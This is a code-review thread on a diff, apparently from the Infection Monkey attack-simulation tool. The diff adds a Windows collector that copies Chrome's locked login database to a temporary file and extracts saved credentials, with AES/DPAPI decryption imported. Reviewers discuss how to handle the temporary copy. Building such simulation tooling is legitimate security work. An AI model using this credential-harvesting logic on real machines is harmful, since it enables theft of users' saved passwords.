monkey/agent_plugins/credentials_collectors/chrome/src/windows_credentials_database_processor.py

```diff
@@ -1,16 +1,168 @@
-from typing import Collection
+import logging
+import shutil
+import sqlite3
+import string
+import tempfile
+from pathlib import Path
+from typing import Collection, List, Optional, Tuple
 
-from common.credentials import Credentials
+from Cryptodome.Cipher import AES
+
+from common.credentials import Credentials, EmailAddress, Password, Username
 from common.types import Event
+from common.utils.code_utils import secure_generate_random_string
+from infection_monkey.utils.threading import interruptible_iter
 
 from .utils import BrowserCredentialsDatabasePath
+from .windows_decryption import win32crypt_unprotect_data
 
+logger = logging.getLogger(__name__)
 
-class WindowsCredentialsDatabaseProcessor:
-    def __init__(self):
-        pass
 
+class WindowsCredentialsDatabaseProcessor:
     def __call__(
         self, interrupt: Event, database_paths: Collection[BrowserCredentialsDatabasePath]
     ) -> Collection[Credentials]:
-        return []
+        credentials = []
+
+        for item in interruptible_iter(database_paths, interrupt):
+            database_path = item.database_file_path
+            master_key = item.master_key
+
+            # copy database before querying it to bypass lock errors
+            temporary_database_path = self._copy_database(database_path)
+            if temporary_database_path:
+                try:
+                    credentials.extend(
+                        self._extract_credentials(
+                            temporary_database_path=temporary_database_path, master_key=master_key
+                        )
+                    )
+                except Exception as err:
+                    logger.debug(f"{err}")
+
+                self._remove_temporary_database(temporary_database_path)
```

Comment:
```suggestion
            try:
                with tempfile.TemporaryFile() as temporary_database_path:
                  # copy database before querying it to bypass lock errors
                   shutil.copy(database_path, temporary_database_path) 
                    credentials.extend(
                        self._extract_credentials(
                            temporary_database_path=temporary_database_path, master_key=master_key
                        )
                    )
            except Exception as err:
                logger.debug(f"{err}")
```

Reply:
Does `shutil.copy` operate on file-like objects? Does a copy method exist that operates on both file-like and paths? My understanding is that it does not

Reply:
We could probably write our own copy method, however

Reply:
shutil.copyfileobj()